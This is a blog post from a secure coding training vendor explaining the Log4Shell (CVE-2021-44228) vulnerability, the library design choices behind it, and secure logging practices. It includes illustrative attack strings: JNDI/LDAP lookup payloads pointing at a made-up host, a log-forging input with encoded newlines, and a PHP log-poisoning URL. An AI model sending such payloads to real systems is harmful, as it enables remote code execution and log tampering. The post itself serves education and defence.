Nobody is wrong, yet everyone knows something is wrong

Posted on Wednesday, Dec 15, 2021 by Attila Szasz ~13 minute(s) to read

Every once in a while, there is that stupid one-liner implementation bug that can be found in all critical systems, and that fancy exploitation technique that nobody has thought of in the past century, which results in a security vulnerability that not only disrupts the whole internet, but all hell breaks loose for cybersecurity professionals, IT admins and developers alike.

The Log4Shell vulnerability is not one of those. Even though the problem is more severe than that.

Let’s look behind the curtains of this world-wide cybersecurity threat in this article and learn the lessons with the eye of a programmer.

Start with some of the facts you probably already know.

Application logging is the process of recording events that have occurred within a software application with the purpose of preserving background information that provides insight into the runtime operation of the application. So, on one hand the main purpose is to help programmers in finding implementation bugs and operational misbehaviours, while on the other hand logs also serve for discovering security issues and provide audit logs, too.

Logging security information during the runtime operation of an application is an essential concept and in fact a requirement that implementations must adhere to. Security requirements are frequently put in place to ensure that

all security relevant events are logged,
no sensitive information is included,
integrity of logs is protected,
inputs are validated at all times
to prevent so-called log injection attacks, where an attacker attempts forging log entries and injecting malicious content via specially crafted input values.
log files are forwarded to some central storage to prevent against scenarios, where some nodes of a complex distributed system get compromised. Rightfully so, as they often do.

Bottom line? Logging is hard.

As a software developer, you would expect that there must be an established recommendation for implementing secure logging in your application. So, the conventional wisdom on the street would tell:

You should never re-implement the wheel. Instead, you should always prefer a mature library for security-related tasks.
Open-source libraries are well-scrutinized and of higher code quality than whatever you have at home or in the corporation you are working for.
Logging more is always better than logging less.

What happens when everyone trusts these assumptions blindly for years, services are implemented along these lines, hundreds of thousands of them get exposed on the internet, yet it turns out that somehow, some of these assumptions were fundamentally violated?

CVE-2021-44228. And apparently, nobody is even wrong.

CC0 image by xkcd

What happened?

An exploit was disclosed on December 9, 2021, affecting Apache Log4j2, a ubiquitous library used by millions for Java applications. The library is part of the Apache Software Foundation’s Apache Logging Services project. The vulnerability, when exploited, results in remote code execution on the vulnerable server with system-level privileges. As a result, it is rated at CVSS v3 score of 10.0, the highest possible.

All versions of Log4j2 versions from 2.0-beta9 up to 2.14.1 are affected by this vulnerability.

In plain English, please?

What really happened was a security disclosure that made us realize that everything we were logging via this library was interpreted in a control context, treating user input as a kind of format string when message lookup substitution was enabled (and for some weird reason that we are going to investigate, it was enabled by default).

Imagine you were about to smuggle some droids and Luke Skywalker through Mos Eisley. Imperials stop you, but it is 2021 and these ones take their Ashtanga yoga seriously, so your Jedi mind tricks won’t work this time, unfortunately. You go

“These aren’t the droids you are looking for. ${jndi:ldap://kenobi.ben/bye}”

Imperials are confused, but they log your response on their computers. They leave you alone, and the saga continues. Or better yet, "${jndi:ldap://kenobi.ben/destroydeathstar}" and let’s get this over with.

So we have this injection kind of vulnerability that is of exceptional impact, but what is the technical background?

The basic attack vector itself has been thoroughly discussed in the community. An attacker can simply ask a server to pass a payload of their choice through the vulnerable library, and once that is done, they enjoy all the comforts of enterprise Java application design. Log4J will oblige with that request and the receiving end is going to initiate a JNDI session over LDAP to download a piece of malicious code in that particular directory for execution. An LDAP endpoint of the attacker’s choice will be selected, and it turns out that not even the most up-to-date Java runtime is going to save the victim from the consequences when the attacker is careful enough with their payload.

Let’s summarize. Code is running on the victim’s system. No file system or config file control is needed, only a log message of the attacker’s choice. Pretty bad indeed.

As a side note, please take a moment to think about all the statements of code that were deemed SQL injection vulnerabilities in the past. A lot of code, a lot of queries.

If we had the power to travel back in time and if we could replace all the vulnerable SQL queries of past decades with corresponding secure implementations, but for some reason, we were also forced to pass the corresponding user input to log4j calls after those statements, then arguably we would be in a worse shape today in terms of security after all. Up until now, the industry wouldn’t have had any idea that the innocent-looking log statements are just as wrong as the SQL injections that we were supposed to mitigate against.

And of course, who could have thought that you must mitigate against the inherent security weaknesses of your log statements as well. A known devil is better than an unknown angel.

It is not a bug, it is a feature

The designers of the library implemented Lookups[] that were designed to assist the developer in adding values to the Log4j configuration at arbitrary places. This does make sense for customizing, for instance, file patterns based on the current date:

<RollingFile name="Rolling-${map:type}" fileName="${filename}" filePattern="target/rolling1/test1-$${date:MM-dd-yyyy}.%i.log.gz">
<PatternLayout>
<pattern>%d %p %c{1.} [%t] %m%n</pattern>
</PatternLayout>
<SizeBasedTriggeringPolicy size="500" />
</RollingFile>

However, the list of lookup features grew over time, culminating in the current set of 18 types of Lookup substitutions that Log4j supports, including things like Docker and Kubernetes variable lookups, as well as the really problematic Environment and JNDI lookups that turned innocent-looking logging expressions into really scary vulnerabilities.

JNDI? What is that?

RFC2713 is a 21-page document defined in 1999, titled Schema for Representing Java(tm) Objects in an LDAP Directory. JNDI itself was defined a year earlier. In the Java world, managing objects remotely via directory interfaces and network protocols is a common daily task, and usually one would consult these technologies and associated ~~anti-~~ patterns when faced with a problem of this type.

Log4j was maintained in the spirit of these specifications, and we ended up with a situation where a specially crafted string passed into those logging APIs defined by Log4j would result in ${jndi:ldap://...} sequences that remotely load attacker-controlled Java class files over LDAP over the internet.

Nobody asked the question whether having full-fledged JNDI lookups around in message substitutions might be a bad idea.

In fact, it is pretty instructive to reference LOG4J2-3198 here, which was the issue opened a few weeks ago (yeah, before the CVE came out, bonus points for transparency) and the associated pull request #607 that finally realized that:

“This feature is not used as far as we’ve been able to tell searching github and stackoverflow, so it’s unnecessary for every log event in every application to burn several cpu cycles searching for the value.”

The actual fix by the way (PR #608) limits JNDI to the minimum and restricts LDAP use.

Backdoor or design failure?

Probably a very bad case of code reuse.

Let’s dig into the development of the involved source codes.

Authors of the library went back and forth on this particular feature, to be fair. As early as 2016, issues like LOG4J2-905 were put in place to mitigate against compatibility problems resulting from the somewhat reckless design decision to apply lookups for message payloads as well – developers of Log4J were trying to come up with a solution that did not break already existing workflows in clever ways. They had no harmful intent as far as I can tell, but they simply missed the security implications of their choices. The central piece of code of our investigation is src/main/java/org/apache/logging/log4j/core/pattern/MessagePatternConverter.java that was meant to provide a class able to replace format string specifiers with values corresponding to the various Lookup backends Log4J implemented over the years. The critical mistake, of course, was not realizing that reusing StrSubstitutors with configurations defaulting to the basic Interpolator (log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/Interpolator.java)

class via statements like

protected final StrSubstitutor substitutor = new StrSubstitutor(new Interpolator());

in the config factory was going to result in message text substitutions being interpreted in a fairly rich context, where JNDI lookups were possible via

log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/JndiLookup.java.

The way these classes are organized, and judging from JIRA issues LOG4J2-3198, LOG4J2-3198 we can see that the authors of the codebase did their best to support existing workflows without realizing the critical security implications. This eventually resulted in completely reverting message lookup substitutions via LOG4J2-3211, when implications of the CVE became clear just 18 hours before this publication was released.

Code as early as commit 6a4c88d lists logic that clearly tries to support disabling of message lookups:

// TODO can we optimize this?
if (config != null && !noLookups) {
    for (int i = offset; i < workingBuilder.length() - 1; i++) {
        if (workingBuilder.charAt(i) == '$' && workingBuilder.charAt(i + 1) == '{') {
            final String value = workingBuilder.substring(offset, workingBuilder.length());
            workingBuilder.setLength(offset);
            workingBuilder.append(config.getStrSubstitutor().replace(event, value));
        }
    }
}

Reviewing commit logs, pull requests, git blame on relevant files and related documentation has no indication of intentional modification of any of this logic for malicious purposes.

We concluded that the resulting vulnerability is really a result of unintentional misjudgment of reusing Lookup and StrSubstititutor business logic on the message parsing level. Maintaining compliance with a feature-rich string replacement logic that was designed to be compliant with overly permissive specs allowing for JNDI, inclusive of LDAP and other security-sensitive protocols resulted in the aforementioned security issue.

How does this affect you, and what should you do?

A lot of organizations are affected, there are already hundreds of them that publicly announced they are investigating the potential impact on their systems [1], and there are tons of others for sure. Dear folks at GreyNoise (hey Andrew![2]) have already identified 2196 public IPs[3] that are opportunistically shooting all of the IPv4 range in hopes of exploiting the vulnerability, and in that sense, everyone on the internet is in danger to some degree.

In order to identify whether you are affected, a thorough review of asset inventories, SBOM are probably necessary across your organization’s software portfolio. Diving into log analytics, closely following vendor bulletins and file system discovery methods should also help in understanding how much this impacts you.

In terms of software development, you should enforce gradle or maven to use non-vulnerable versions of Log4j. There are hot patches available that are worth looking into, and of course the main recommendation is that you update to the latest version of the library or use a backported release (2.16.0, 2.12.2-rc1, respectively).

Secure coding lessons

Don’t feel bad if you used this library in your development and ended up producing some entry points for this vulnerability. It is no more your fault than it is Will Hunting’s or anyone else’s at this point. Security vulnerabilities are present in third-party software, all we can do is minimize the likelihood of similar catastrophes by employing a software development lifecycle that integrates security end-to-end.

As cliché as it sounds on the blog of a secure coding training provider, we really think that the cheapest and most effective way to do software security is through training.

The most important secure coding lesson is to protect against log-injection:

Tampering with the input of logging methods was generally not something that security professionals considered as a remote code execution threat in the average case, but for those who are late to the party, we’ll quickly recap log injection and log forging techniques (as defined by OWASP) to highlight that issues similar to the attack vectors discussed are much more common and relevant to you than this exceptional situation might suggest.

Let’s consider the following web application code [4].

...
	String val = request.getParameter("val");
	try {
    	int value = Integer.parseInt(val);
	}
	catch (NumberFormatException) {
    	log.info("Failed to parse val = " + val);
	}
...

We try to read an integer, and if we can’t parse it, we log the problem. The attacker can clearly submit things like

twenty-one%0a%0aINFO:+User+logged+out%3dbadguy

so that the following entry gets logged:

INFO: Failed to parse val=twenty-one

INFO: User logged out=badguy

Can we highlight an example where actual remote code execution could result from this? Our old friend, PHP comes to the “rescue”:

https://www.somedomain.tld/index.php?file=<?php echo phpinfo(); ?>

Using a query like this, we could poison a log file to contain some nasty PHP code, and misconfigured webservers of the past were prone to these kinds of command injections under certain configurations when the poisoned log file could be invoked as code. Fortunately, neither me nor OWASP can list a similar issue from the Node/Express world, and let’s hope that Log4Shell will prove to be the last modern day logging issue that could be turned into an RCE.

Principles of secure logging:

On top of what was already discussed in the context of secure logging, here are the 5 main points that we encourage you to adhere to when it comes to your own logging practices and infrastructure.

1. Purposeful logging.

The question here that you have to answer is, which events are security related or required for operational use? Make sure you log all of those, but only those.

2. No sensitive information in the logs.

Redact/exclude/anonymize sensitive information. Decide whether a piece of information helps you or the attacker.

3. Integrity protection of each log entry.

Apply extended hash or HMAC signatures for all log events uniquely.

extended_hash_of_a_new_log_entry := hash(previous hash + hash(new_log_entry)) hmac_of_a_new_log_entry := hmac(key + previous hmac + hmac(new_log_entry))

Ideally calculate these hash values by a hardware security module, like a TPM chip to ensure that no entries can be removed from a log file.

4. No input values in the logs.

Log files are inherently vulnerable to injection type of attacks. So no values, no strings that may come from external sources should be written into log entries. If it is absolutely necessary to record a value that may be influenced by the outside world, store those values only in encoded form. So, apply BASE64 encoding for any binary inputs, text strings and even for numeric values.

[2021-12-15 09:15:23] The applicant <U0NBREVNWQ> registered for the “Advanced TPM Security” course. HMAC=10e4c532a05be7b7c189dfc9c5b9057543427c58

5. Logs should be shipped away to some central storage

Use the updated Log4j for this purpose. :-)

Update

Oops. Rather don’t use it. A vulnerability has been found in the patch.

Closing thoughts

CC0 image by The Cyber Security Hub

If you use third party components that everybody else uses you will be affected by the vulnerabilities found and published in those components, just as everybody else. This will not be your fault. If you decide to develop your proprietary solution then be prepared that you will commit the same mistakes, and then you will have to learn from your own mistakes. We all learn from mistakes. The question is whether we commit those mistakes during training or in production.